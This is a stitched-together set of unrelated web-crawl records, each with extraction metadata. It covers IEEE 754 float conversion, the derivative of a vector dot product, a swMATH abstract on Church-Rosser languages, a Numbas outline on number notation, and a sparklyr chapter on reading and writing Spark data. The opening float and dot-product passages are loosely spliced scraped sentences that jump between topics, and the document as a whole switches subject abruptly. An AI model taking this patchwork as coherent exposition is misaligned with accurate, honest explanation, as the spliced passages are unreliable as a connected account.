A typical assignment: convert each of the following 32-bit IEEE 754 single precision bit patterns to its corresponding decimal value (the bits are separated into groups of 4 to make interpretation easier), where step 1 is to convert the decimal number to its binary fractional form. Complete converter implementations are easy to find, e.g. a GitHub project that converts decimal numbers to the IEEE-754 single precision (32-bit) and double precision (64-bit) representations and back.
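A short Python sketch of the representability remarks above: 0.5 is stored exactly in binary64, while 0.1 is only the nearest representable double.

```python
from decimal import Decimal
from fractions import Fraction

print(Fraction(0.5))   # 1/2 -- exact
print(Fraction(0.1))   # 3602879701896397/36028797018963968 -- not 1/10
print(Decimal(0.1))    # 0.1000000000000000055511151231257827021181583404541015625
```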
Related standards and implementations include IEEE 754-1985; the Intel 8087, an early implementation of the then-draft IEEE 754-1985; minifloats, low-precision binary floating-point formats following IEEE 754 principles; the half, single, double, and quadruple precision formats; and the IBM System z9, the first CPU to implement IEEE 754-2008 (using hardware microcode). Floating-point arithmetic had been the subject of controversy and of many divergent implementations until 1985, when the IEEE finished and published a document standardizing how floating-point numbers are represented and how the arithmetic operations on them are carried out. PEP 754 proposes an API and provides a reference module that generates and tests for the IEEE 754 double-precision special values: positive infinity, negative infinity, and not-a-number (NaN). GCC's -mfp16-format=ieee option selects the IEEE 754-2008 half precision (binary16) format, whose specification is also the source for much of a public test suite.

Converters use round-half-to-even, the default IEEE rounding mode, when a decimal input falls between two representable values. The number of bits matters even for constants: in Fortran, a more exact approximation of a constant is computed when the program specifies a double-precision constant, and mixed designs may pair an 8-bit integer accumulator with a 32-bit IEEE-754 accumulator. Correctly rounding elementary functions runs into the table-maker's dilemma. The single-precision exponent encoding, with its bias of 127, is also known as the excess-127 format.

Two final worked conversions. The 32-bit single-precision pattern 1 10000101 01000000000000000000000 in scientific notation is −1.01₂ × 2^6, since 10000101₂ = 133 and 133 − 127 = 6. Going the other way, the decimal number 0.8676 encodes approximately as 0 | 01111110 | 10111100001101100001000: sign 0, biased exponent 126 (i.e. power −1), significand ≈ 1.7352, and 1.7352 × 2^-1 ≈ 0.8676. For day-to-day work, pages such as the IEEE-754 Analysis page are convenient for decoding hex strings copied from Wireshark or similar tools into their decimal values.
2020-07-10 10:09:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4261840879917145, "perplexity": 2700.994437018835}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655906934.51/warc/CC-MAIN-20200710082212-20200710112212-00484.warc.gz"}
http://usecase.harmis.com.br/7lp44oa/vector-dot-product-derivative-calculator-a4f73f
vector dot product derivative calculator

The dot product, also known as the scalar product, is an algebraic operation between two sequences of numbers that returns a single number; this is why it is called the scalar product. In Euclidean geometry, for vectors vec(u) = (x, y, z) and vec(v) = (x', y', z'), the dot product of the Cartesian coordinates is u · v = xx' + yy' + zz', and the two vectors are orthogonal exactly when xx' + yy' + zz' = 0. In two dimensions we can think of u₃ = 0 and v₃ = 0, and the same formula holds. More generally, the dot product can be calculated through any two sequences of equal length. In Euclidean n-space, cos θ = 1 would mean that the dot product of A and B equals the norm of A times the norm of B.

An online dot product calculator finds the product step by step, and the calculation can be done with numbers or with literal expressions: for example dot_product([1;5];[1;3]) for numeric vectors, while a symbolic computation may return a result such as -a/2 + (b*a)/2 + 2*a^2. The same calculators usually also offer the product of a vector by a number.

For derivatives, one of the most common modern notations is due to Joseph-Louis Lagrange, in which a prime mark denotes a derivative. A standard exercise: if r₁(t) and r₂(t) are two parametric curves, show that the product rule for derivatives holds for the dot and cross products, i.e. (r₁ · r₂)' = r₁' · r₂ + r₁ · r₂'. A common point of confusion, raised in a related Q&A: when differentiating a squared norm, you are taking the dot product of the derivative of a vector with the vector, not of the vector with itself. A numeric check of the product rule is sketched below.
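A hedged numeric check of the product rule quoted above, using central differences; the curves r1 and r2 are illustrative choices, not from the original page.

```python
import numpy as np

# Check d/dt (r1 . r2) = r1' . r2 + r1 . r2' at one point numerically.
def r1(t): return np.array([np.cos(t), np.sin(t), t])
def r2(t): return np.array([t**2, 1.0, np.exp(t)])

t, h = 0.7, 1e-6
lhs = (r1(t + h) @ r2(t + h) - r1(t - h) @ r2(t - h)) / (2 * h)

dr1 = (r1(t + h) - r1(t - h)) / (2 * h)   # central-difference derivatives
dr2 = (r2(t + h) - r2(t - h)) / (2 * h)
rhs = dr1 @ r2(t) + r1(t) @ dr2

print(lhs, rhs)   # the two values agree closely
```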
2021-01-16 09:21:46
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7498139142990112, "perplexity": 834.1683522346804}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703505861.1/warc/CC-MAIN-20210116074510-20210116104510-00188.warc.gz"}
http://swmath.org/software/2951
# UCFL

Church-Rosser languages vs. UCFL. The class of growing context-sensitive languages (GCSL) was proposed as a naturally defined subclass of the context-sensitive languages whose membership problem is solvable in polynomial time. In this paper we concentrate on the class of Church-Rosser languages (CRL), the "deterministic counterpart" of GCSL. We prove the conjecture that the set of palindromes is not in CRL. This implies that CFL $\cap$ co-CFL as well as UCFL $\cap$ co-UCFL are not included in CRL, where UCFL denotes the class of unambiguous context-free languages. Our proof uses a novel pumping technique, which is of independent interest.

Referenced in 11 articles in zbMATH.
2017-02-25 13:39:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5037234425544739, "perplexity": 2095.23010927878}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171775.73/warc/CC-MAIN-20170219104611-00079-ip-10-171-10-108.ec2.internal.warc.gz"}
https://www.numbas.org.uk/behind-the-design/number-notation.html
# Number notation

Page status: Outline

This is a rough outline of an article. It might not use full sentences everywhere and probably won't make much sense at the moment.

There are many different ways of writing numbers, depending on culture and context.

Consider "standard" decimal numbers. These are a subset of $$\mathbb{R}$$ (and of $$\mathbb{Q}$$!). In English, normally this is a series of digits, with a dot separating the integer and fractional parts. In some contexts, the number of digits after the point might be significant, or you might want to group digits for readability. Different contexts use different punctuation and grouping rules, e.g. in India the integer part is written in groups of 2 and then a least-significant group of 3. It is not true that every number has a unique decimal representation.

'Scientific' and 'engineering' notation describe numbers at different orders of magnitude, but to similar relative precision. Sometimes a trailing dot is used to show a precision of zero decimal places in the significand, e.g. 35.e+10. This notation represents the same set of decimal numbers as the usual English notation described above.

'Fractions' represent elements of $$\mathbb{Q}$$. In English, fractions are often written a / b. Mixed fractions, e.g. A b/c, are common, but not understood everywhere. Some countries use : as the separator for the numerator and denominator, e.g. a : b. Fractions don't encode precision: they are usually interpreted as completely precise. Ratios represent fractions, but with different semantics: a ratio of 3 : 4 could be interpreted as saying that the first quantity makes up three-sevenths of the whole. Some contexts use mixed fractions with a fixed denominator, e.g. US gas prices (tenths of a cent) or stock prices (sixteenths of a dollar).

There are many 'number-like' quantities, with their own notations:

- Percentages. There are percentages of and percentage changes, both written using the same symbols. 0% and 100% should not be rounded to, when working with a 'percentage of'.
- Angles. While angles are dimensionless, there are many scales, including: degrees, radians, gradians, minutes and seconds.
- Measurements in Imperial units often use a mix of orders of magnitude, e.g. 3lb 4oz.
- Complex numbers, often written in Cartesian ($$a + bi$$) or polar ($$re^{i \theta}$$) form.
- Vectors, written as a tuple of scalars $$(a,b,c)$$.
- Currency. Most currencies have a subdivision with its own symbol, e.g. ¢. The currency symbol is not always in the same place and is not necessarily unique, e.g. $. Amounts of currency are often rounded to the nearest penny, but not always.
- Scores, e.g. in cricket when counting bowling, '2.5' means two overs and 5 balls.
- Ages of young children, e.g. '2.3' means '2 years and 3 months'.
- Times. "Time of day" and "time elapsed" are different.

Care must be taken when rounding near a critical value. For example, if the pass mark for an exam is 70%, don't round 69.7% up (see the sketch at the end of this page).

In place-value systems, different bases exist. Sometimes the base is implicit, other times it is denoted with a suffix or prefix, usually a subscript, e.g. $$1011_2$$. Styles of notation can conflict with each other, e.g. 1.234 in English vs French.

There are number-like objects that don't have any arithmetic:

- Phone numbers. Around the world there are different conventions for how the digits are grouped.
- ISBN codes.
- US zip codes.
- House numbers.

Here are some properties that number-like things might have:

- Ordering.
There are number-like objects that don't have any arithmetic:

- Phone numbers. Around the world there are different conventions for how the digits are grouped.
- ISBN codes.
- US zip codes.
- House numbers.

Here are some properties that number-like things might have:

- Ordering.
- The Intermediate Value Theorem.
- A selection of arithmetic operations.
- Being a (dense) subset of the real numbers.
- Multiple ways of representing the same amount.
- Having a meaningful 'zero'.

The difference between two number-like things might not be the same type of thing, e.g. a percentage change, or a difference in time. An important concept is the torsor: a measurement that has well-defined differences but no meaningful 'zero'. Temperatures and times are examples of torsors.

Another concept is 'levels of measurement', based on how two values can be combined:

- Nominal: can be compared for equality.
- Ordinal: can be compared for ordering.
- Interval: can be added and subtracted.
- Ratio: can be multiplied and divided.

Numbers can be written in words. There are lots of conventions for this, even just in English:

- Include "and" after hundreds?
- When are hyphens included? e.g. "twenty-five" vs "twenty five"; "three-hundred" vs "three hundred".

Even ignoring these differences, it is not true that every number has a unique representation in words, e.g. "twelve hundred" and "one thousand, two hundred".

## Problem

Should the "number entry" part only be used for situations where the answer is an element of $$\mathbb{R}$$? Do percentages require a separate part type?
https://therinspark.com/data.html
# Chapter 8 Data

Has it occurred to you that she might not have been a reliable source of information? — Jon Snow

With the knowledge acquired in previous chapters, you are now equipped to start doing analysis and modeling at scale! So far, however, we haven't really explained much about how to read data into Spark: we have used copy_to() to upload small datasets, and functions like spark_read_csv() or spark_write_csv(), without explaining in detail how and why. So, you are about to learn how to read and write data using Spark.

While this is important on its own, this chapter will also introduce you to the data lake: a repository of data stored in its natural or raw format that provides various benefits over existing storage architectures. For instance, you can easily integrate data from external systems without transforming it into a common format and without assuming those sources are as reliable as your internal data sources. In addition, we discuss how to extend Spark's capabilities to work with data that is not accessible out of the box, and make several recommendations focused on improving performance when reading and writing data. Reading large datasets often requires you to fine-tune your Spark cluster configuration, but that's the topic of Chapter 9.

## 8.1 Overview

In Chapter 1, you learned that beyond big data and big compute, you can also use Spark to improve velocity, variety, and veracity in data tasks. While you can use the learnings of this chapter for any task requiring loading and storing data, it is particularly interesting to present it in the context of dealing with a variety of data sources. To understand why, we should first take a quick detour to examine how data is currently processed in many organizations.

For several years, it has been common practice to store large datasets in a relational database, a system first proposed in 1970 by Edgar F. Codd.¹ You can think of a database as a collection of tables that are related to one another, where each table is carefully designed to hold specific data types and relationships to other tables. Most relational database systems use Structured Query Language (SQL) for querying and maintaining the database. Databases are still widely used today, with good reason: they store data reliably and consistently; in fact, your bank probably stores account balances in a database, and that's a good practice.

However, databases have also been used to store information from other applications and systems. For instance, your bank might also store data produced by other banks, such as incoming checks. To accomplish this, the external data needs to be extracted from the external system, transformed into something that fits the current database, and finally loaded into it. This is known as Extract, Transform, and Load (ETL), a general procedure for copying data from one or more sources into a destination system that represents the data differently from the source. The ETL process became popular in the 1970s.

Aside from databases, data is often also loaded into a data warehouse, a system used for reporting and data analysis. The data is usually stored and indexed in a format that increases data analysis speed, but that is often not suitable for modeling or running custom distributed code.
The challenge is that changing databases and data warehouses is usually a long and delicate process, since data needs to be reindexed, and data from multiple sources needs to be carefully transformed into the single tables shared across data sources. Instead of trying to transform all data sources into a common format, you can embrace this variety of data sources in a data lake: a system or repository of data stored in its natural format (see Figure 8.1). Since data lakes make data available in its original format, there is no need to carefully transform it in advance; anyone can use it for analysis, which adds significant flexibility over ETL. You can then use Spark to unify data processing from data lakes, databases, and data warehouses through a single interface that is scalable across all of them. Some organizations also use Spark to replace their existing ETL process; however, this falls in the realm of data engineering, which is well beyond the scope of this book. We illustrate this with dotted lines in Figure 8.1.

To support a broad variety of data sources, Spark needs to be able to read and write data in several different file formats (CSV, JSON, Parquet, and others), access them while stored in several file systems (HDFS, S3, DBFS, and more) and, potentially, interoperate with other storage systems (databases, data warehouses, etc.). We will get to all of that, but first, we will start by presenting how to read, write, and copy data using Spark.

## 8.2 Reading Data

If you are new to Spark, it is highly recommended to review this section before you start working with large datasets. We will introduce several techniques that improve the speed and efficiency of reading data. Each subsection presents specific ways to take advantage of how Spark reads files, such as the ability to treat entire folders as datasets, and the ability to describe a dataset up front so it can be read faster.

### 8.2.1 Paths

For example, suppose one small dataset is split across two CSV files in the same folder. In plain R, reading the combined dataset means enumerating and binding the files yourself:

```r
letters <- data.frame(x = letters, y = 1:length(letters))

dir.create("data-csv")
write.csv(letters[1:3, ], "data-csv/letters1.csv", row.names = FALSE)
write.csv(letters[1:3, ], "data-csv/letters2.csv", row.names = FALSE)

do.call("rbind", lapply(dir("data-csv", full.names = TRUE), read.csv))
```

```
  x y
1 a 1
2 b 2
3 c 3
4 a 1
5 b 2
6 c 3
```

In Spark, there is the notion of a folder as a dataset. Instead of enumerating each file, you simply pass the path containing all the files, and Spark assumes that every file in that folder is part of the same dataset. This implies that the target folder should be used only for data purposes. It matters especially because storage systems like HDFS store files across multiple machines even though, conceptually, the files sit in the same folder; when Spark reads from this folder, it actually executes distributed code to read each file within each machine, and no data is transferred between machines when distributed files are read:

```r
library(sparklyr)
sc <- spark_connect(master = "local", version = "2.3")

spark_read_csv(sc, "data-csv/")
```

```
# Source: spark<datacsv> [?? x 2]
  x         y
  <chr> <int>
1 a         1
2 b         2
3 c         3
4 a         1
5 b         2
6 c         3
```
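As a hedged aside not covered above: in most Spark setups the path argument also accepts Hadoop-style glob patterns, so a subset of a folder can be selected without enumerating files. A minimal sketch, assuming the same `sc` connection (the table name is made up):

```r
# Hadoop-style globs in the path select only the matching files
# within the folder-as-dataset.
spark_read_csv(sc, name = "letters_subset", path = "data-csv/letters*.csv")
```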
The "folder as a table" idea is found in other open source technologies as well. Under the hood, Hive tables work the same way: when you query a Hive table, the mapping is done over multiple files within the same folder, and the folder's name usually matches the name of the table visible to the user.

Next, we present a technique that allows Spark to read files faster, and with fewer read failures, by describing the structure of a dataset in advance.

### 8.2.2 Schema

When reading data, Spark is able to determine the data source's column names and column types, also known as the schema. However, guessing the schema comes at a cost: Spark needs to do an initial pass on the data to infer it. For a large dataset, this can add a significant amount of time to the data ingestion process, which can become costly even for medium-sized datasets, and for files that are read over and over again, the additional read time accumulates.

To avoid this, Spark allows you to provide a column definition through the columns argument. You can create this schema by sampling a small portion of the original file yourself:

```r
spec_with_r <- sapply(read.csv("data-csv/letters1.csv", nrows = 10), class)
spec_with_r
```

```
        x         y 
 "factor" "integer" 
```

Or, you can set the column specification to a vector containing the column types explicitly. The vector's values are named to match the field names:

```r
spec_explicit <- c(x = "character", y = "numeric")
spec_explicit
```

```
          x           y 
"character"   "numeric" 
```

The accepted variable types are: integer, character, logical, double, numeric, factor, Date, and POSIXct.

Then, when reading with spark_read_csv(), you can pass spec_with_r to the columns argument to match the names and types of the original file. This improves performance, since Spark no longer needs to determine the column types:

```r
spark_read_csv(sc, "data-csv/", columns = spec_with_r)
```

```
# Source: spark<datacsv> [?? x 2]
  x         y
  <chr> <int>
1 a         1
2 b         2
3 c         3
4 a         1
5 b         2
6 c         3
```

The following example shows how to set a field type to something different. The new type needs to be compatible with the original data: for example, you cannot set a character field to numeric, and an incompatible type makes the file read fail with an error. The example also changes the names of the original fields:

```r
spec_compatible <- c(my_letter = "character", my_number = "character")

spark_read_csv(sc, "data-csv/", columns = spec_compatible)
```

```
# Source: spark<datacsv> [?? x 2]
  my_letter my_number
  <chr>     <chr>    
1 a         1        
2 b         2        
3 c         3        
4 a         1        
5 b         2        
6 c         3        
```

In Spark, malformed entries can cause errors during reading, particularly for non-character fields. To prevent such errors, we can use a file specification that imports the risky fields as characters and then use dplyr to coerce them into the desired type:
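A minimal sketch of that defensive pattern, assuming the same connection and folder as above (the all-character spec and the as.integer() coercion are illustrative choices, not from the original text):

```r
# Import every field as character so malformed rows cannot break the
# read, then coerce inside Spark; as.integer() translates to a SQL CAST.
spec_safe <- c(x = "character", y = "character")

spark_read_csv(sc, "data-csv/", columns = spec_safe) %>%
  dplyr::mutate(y = as.integer(y))
```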
This subsection reviewed how we can read files faster and with fewer failures, which lets us start our analysis more quickly. Another way to accelerate our analysis is by loading less data into Spark memory, which we examine in the next section.

### 8.2.3 Memory

By default, when you read data into Spark from R, it is copied into Spark's distributed memory, making data analysis and other operations very fast. There are cases, such as when the data is too big, for which loading all the data might not be practical or even necessary. For those cases, Spark can just "map" the files without copying data into memory.

The mapping creates a sort of virtual table in Spark. The implication is that when a query runs against that table, Spark needs to read the data from the files at query time, and any subsequent reads do the same; in effect, Spark becomes a pass-through for the data. The advantage of this method is that there is almost no up-front cost to "reading" the file, since the mapping is very fast. The downside is that queries that actually extract data take longer.

This is controlled by the memory argument of the read functions. Setting it to FALSE prevents the data copy (the default is TRUE):

```r
mapped_csv <- spark_read_csv(sc, "data-csv/", memory = FALSE)
```

There are good use cases for this method, one of which is when not all columns of a table are needed. For example, take a very large file that contains many columns. Assuming this is not the first time you interact with this data, you would know which columns are needed for the analysis. The files can then be read with memory = FALSE, the needed columns selected with dplyr, and the resulting dplyr variable cached into memory using the compute() function. This makes Spark query the file(s), pull only the selected fields, and copy just that data into memory. The result is an in-memory table that took comparatively less time to ingest:

```r
mapped_csv %>%
  dplyr::select(y) %>%
  dplyr::compute("test")
```

The next section covers a short technique that makes it easier to keep the original field names of imported data.

### 8.2.4 Columns

Spark 1.6 required that column names be sanitized, so sparklyr does that by default. There might be cases when you would like to keep the original names intact, for instance when working with Spark 2.0 or above. To do that, set the sparklyr.sanitize.column.names option to FALSE:

```r
options(sparklyr.sanitize.column.names = FALSE)
copy_to(sc, iris, overwrite = TRUE)
```

```
# Source: table<iris> [?? x 5]
# Database: spark_connection
   Sepal.Length Sepal.Width Petal.Length Petal.Width Species
          <dbl>       <dbl>        <dbl>       <dbl> <chr>  
 1          5.1         3.5          1.4         0.2 setosa 
 2          4.9         3            1.4         0.2 setosa 
 3          4.7         3.2          1.3         0.2 setosa 
 4          4.6         3.1          1.5         0.2 setosa 
 5          5           3.6          1.4         0.2 setosa 
 6          5.4         3.9          1.7         0.4 setosa 
 7          4.6         3.4          1.4         0.3 setosa 
 8          5           3.4          1.5         0.2 setosa 
 9          4.4         2.9          1.4         0.2 setosa 
10          4.9         3.1          1.5         0.1 setosa 
# ... with more rows
```

With this review of how to read data into Spark, we move on to how to write data from a Spark session.

## 8.3 Writing Data

Some projects require that new data generated in Spark be written back to a remote source. For example, the data could be new predicted values returned by a Spark model: the job handles the mass generation of predictions, but the predictions then need to be stored somewhere. This section focuses on how you should use Spark to move data from Spark into an external destination.

Many new users start by downloading Spark data into R and then uploading it to a target, as illustrated in Figure 8.2. This works for smaller datasets but becomes inefficient for larger ones, since the data typically grows to the point where it is no longer feasible for R to be the middle point. Instead, all efforts should be made to have Spark connect to the target location, so that reading, processing, and writing happen within the same Spark session. As Figure 8.3 shows, this approach scales as far as the Spark cluster allows and prevents R from becoming a choke point.
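As a minimal sketch of this preferred flow (the filter and the output path are hypothetical), the read, transform, and write steps stay entirely inside Spark, so only instructions travel through R, never the rows:

```r
# Read lazily, transform in Spark, and write the result from Spark itself.
spark_read_csv(sc, "input", "data-csv/", memory = FALSE) %>%
  dplyr::filter(y > 1) %>%
  spark_write_parquet("predictions.parquet", mode = "overwrite")
```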
Consider the following scenario: a Spark job just processed predictions for a large dataset, resulting in a considerable number of predictions. Choosing a method to write the results depends on your technology infrastructure; more specifically, on whether Spark and the target are running in the same cluster.

When Spark and the target are in the same cluster, copying the results is not a problem: the data transfer happens between the RAM and disk of the same cluster, or is efficiently shuffled through a high-bandwidth connection. But what if the target is not within the Spark cluster? There are two options, and choosing between them depends on the size of the data and the network speed:

- Spark transfer: Spark connects to the remote target location and copies the new data. If this is done within the same datacenter or cloud provider, the transfer could be fast enough for Spark to write the data directly.
- External transfer: Otherwise, Spark writes the results to disk as files, and a separate job transfers them via a third-party application; at the target location, a separate process then loads the data into the target system.

It is best to recognize that Spark, R, and any other technology are tools. No tool can do everything, nor should it be expected to.

Next, we describe how to copy data into Spark, and how to collect large datasets that don't fit in memory; this can be used to transfer data across clusters, or to help initialize your distributed datasets.

## 8.4 Copy

Previous chapters used copy_to() as a handy helper to copy data into Spark; however, copy_to() can only transfer datasets that are already loaded in memory, and those tend to be much smaller than the kind of datasets you would want to copy into Spark. For instance, suppose that we have a 3 GB dataset generated as follows:

```r
dir.create("largefile.txt")
write.table(matrix(rnorm(10 * 10^6), ncol = 10), "largefile.txt/1",
            append = TRUE, col.names = FALSE, row.names = FALSE)
for (i in 2:30)
  file.copy("largefile.txt/1", paste0("largefile.txt/", i))
```

If we had only 2 GB of memory in the driver node, we could not load this 3 GB file into memory using copy_to(). Instead, when using HDFS as storage in your cluster, you can use the hadoop command-line tool to copy files from disk into Spark from the terminal. Notice that the following command works only in clusters using HDFS, not in local environments:

```bash
hadoop fs -copyFromLocal largefile.txt largefile.txt
```

You can then read the uploaded file, as described in the File Formats section; for text files, you would run:

```r
spark_read_text(sc, "largefile.txt", memory = FALSE)
```

```
# Source: spark<largefile> [?? x 1]
   line                                                                    
   <chr>                                                                   
 1 0.0982531064914565 -0.577567317599452 -1.66433938237253 -0.20095089489…
 2 -1.08322304504007 1.05962389624635 1.1852771207729 -0.230934710049462 …
 3 -0.398079835552421 0.293643382374479 0.727994248743204 -1.571547990532…
 4 0.418899768227183 0.534037617828835 0.921680317620166 -1.6623094393911…
 5 -0.204409401553028 -0.0376212693728992 -1.13012269711811 0.56149527218…
 6 1.41192628218417 -0.580413572014808 0.727722566256326 0.5746066486689 …
 7 -0.313975036262443 -0.0166426329807508 -0.188906975208319 -0.986203251…
 8 -0.571574679637623 0.513472254005066 0.139050812059352 -0.822738334753…
 9 1.39983023148955 -1.08723592838627 1.02517804413913 -0.412680186313667…
10 0.6318328148434 -1.08741784644221 -0.550575696474202 0.971967251067794…
# … with more rows
```
collect() has a similar limitation: it can only collect datasets that fit in the driver's memory. However, if you had to extract a large dataset from Spark through the driver node, you could use the specialized tools provided by the distributed storage. For HDFS, you would run:

```bash
hadoop fs -copyToLocal largefile.txt largefile.txt
```

Alternatively, you can collect datasets that don't fit in memory by providing a callback to collect(). A callback is just an R function that is called over each Spark partition; you can then write each partition to disk, or push it to other clusters over the network. The following code could collect 3 GB even if the driver node had less than 3 GB of memory. That said, as Chapter 3 explains, you should avoid collecting large datasets into a single machine, since this creates a significant performance bottleneck. For conciseness, we collect only the first million rows; feel free to remove head(10^6) if you have a few minutes to spare:

```r
dir.create("large")
spark_read_text(sc, "largefile.txt", memory = FALSE) %>%
  head(10^6) %>%
  collect(callback = function(df, idx) {
    writeLines(df$line, paste0("large/large-", idx, ".txt"))
  })
```

Make sure you clean up these large files and empty your recycle bin as well:

```r
unlink("largefile.txt", recursive = TRUE)
unlink("large", recursive = TRUE)
```

In most cases, data will already be stored in the cluster, so you should not need to worry about copying large datasets; instead, you can usually focus on reading and writing different file formats, which we describe next.

## 8.5 File Formats

Out of the box, Spark is able to interact with several file formats, like CSV, JSON, LIBSVM, ORC, and Parquet. Table 8.1 maps each file format to the functions you should use to read and write data in Spark.

TABLE 8.1: Spark functions to read and write file formats

| Format | Read | Write |
|---|---|---|
| Comma separated values (CSV) | spark_read_csv() | spark_write_csv() |
| JavaScript Object Notation (JSON) | spark_read_json() | spark_write_json() |
| Library for Support Vector Machines (LIBSVM) | spark_read_libsvm() | spark_write_libsvm() |
| Optimized Row Columnar (ORC) | spark_read_orc() | spark_write_orc() |
| Apache Parquet | spark_read_parquet() | spark_write_parquet() |
| Text | spark_read_text() | spark_write_text() |

The following sections describe special considerations particular to each file format, as well as some of the strengths and weaknesses of a few popular formats, starting with the well-known CSV.

### 8.5.1 CSV

The CSV format might be the most common file type in use today. It is defined as a text file whose values are separated by a given character, usually a comma.
Reading CSV files is usually straightforward; however, it's worth mentioning a couple of techniques that can help you process CSVs that are not fully compliant with the well-formed CSV format. Spark offers the following modes for addressing parsing issues:

- Permissive: inserts NULL values for missing tokens.
- Drop Malformed: drops lines that are malformed.
- Fail Fast: aborts as soon as it encounters a malformed line.

You can use these in sparklyr by passing them inside the options argument. The following example creates a file with a broken entry and then shows how to read it into Spark:

```r
# Create a bad test file
writeLines(c("bad", 1, 2, 3, "broken"), "bad.csv")

spark_read_csv(
  sc,
  "bad3",
  "bad.csv",
  columns = list(foo = "integer"),
  options = list(mode = "DROPMALFORMED"))
```

```
# Source: spark<bad3> [?? x 1]
    foo
  <int>
1     1
2     2
3     3
```

Spark also provides an issue-tracking column, which is hidden by default. To enable it, add _corrupt_record to the columns list. You can combine this with the PERMISSIVE mode: all rows are imported, invalid entries receive an NA, and the issue is tracked in the _corrupt_record column:

```r
spark_read_csv(
  sc,
  "bad2",
  "bad.csv",
  columns = list(foo = "integer", "_corrupt_record" = "character"),
  options = list(mode = "PERMISSIVE")
)
```

```
# Source: spark<bad2> [?? x 2]
    foo _corrupt_record
  <int> <chr>          
1     1 NA             
2     2 NA             
3     3 NA             
4    NA broken         
```

Reading and storing data as CSV is quite common and supported across most systems. For tabular datasets it remains a popular option, but for datasets containing nested structures and nontabular data, JSON is usually preferred.

### 8.5.2 JSON

JSON is a file format originally derived from JavaScript that has grown to be language-independent and very popular due to its flexibility and ubiquitous support. Reading and writing JSON files is quite straightforward:

```r
writeLines("{'a':1, 'b': {'f1': 2, 'f3': 3}}", "data.json")

simple_json <- spark_read_json(sc, "data.json")
simple_json
```

```
# Source: spark<data> [?? x 2]
      a b         
  <dbl> <list>    
1     1 <list [2]>
```

However, when you deal with a dataset containing nested fields like the one from this example, it is worth pointing out how to extract them. One approach is to use a JSON path, a domain-specific syntax commonly used to extract and query JSON documents. You can use a combination of get_json_object() and to_json() to specify the JSON path you are interested in; to extract f1, you would run the following transformation:

```r
simple_json %>%
  dplyr::transmute(z = get_json_object(to_json(b), '$.f1'))
```

```
# Source: spark<?> [?? x 1]
  z    
  <chr>
1 2    
```

Another approach is to install sparklyr.nested from CRAN with install.packages("sparklyr.nested") and then unnest nested data with sdf_unnest():

```r
sparklyr.nested::sdf_unnest(simple_json, "b")
```

```
# Source: spark<?> [?? x 3]
      a    f1    f3
  <dbl> <dbl> <dbl>
1     1     2     3
```

While JSON and CSV are quite simple to use and versatile, they are not optimized for performance; other formats, like ORC, AVRO, and Parquet, are.

### 8.5.3 Parquet

Apache Parquet, Apache ORC, and Apache AVRO are all file formats designed with performance in mind. Parquet and ORC store data in columnar format, while AVRO is row-based. All of them are binary file formats, which reduces storage space and improves performance. This comes at the cost of making them a bit more difficult to read by external systems and libraries; however, this is usually not an issue when they are used as intermediate data storage within Spark.
To illustrate this, Figure 8.4 plots the result of running a 1-million-row write-speed benchmark using the bench package; feel free to run your own benchmarks over meaningful datasets when deciding which format best fits your needs:

```r
numeric <- copy_to(sc, data.frame(nums = runif(10^6)))

bench::mark(
  CSV = spark_write_csv(numeric, "data.csv", mode = "overwrite"),
  JSON = spark_write_json(numeric, "data.json", mode = "overwrite"),
  Parquet = spark_write_parquet(numeric, "data.parquet", mode = "overwrite"),
  ORC = spark_write_orc(numeric, "data.orc", mode = "overwrite"),
  iterations = 20
) %>% ggplot2::autoplot()
```

From now on, be sure to disconnect from Spark before running any new spark_connect() command we present:

```r
spark_disconnect(sc)
```

This concludes the introduction to some of the file formats supported out of the box; next, we present how to deal with formats that require external packages and customization.

### 8.5.4 Others

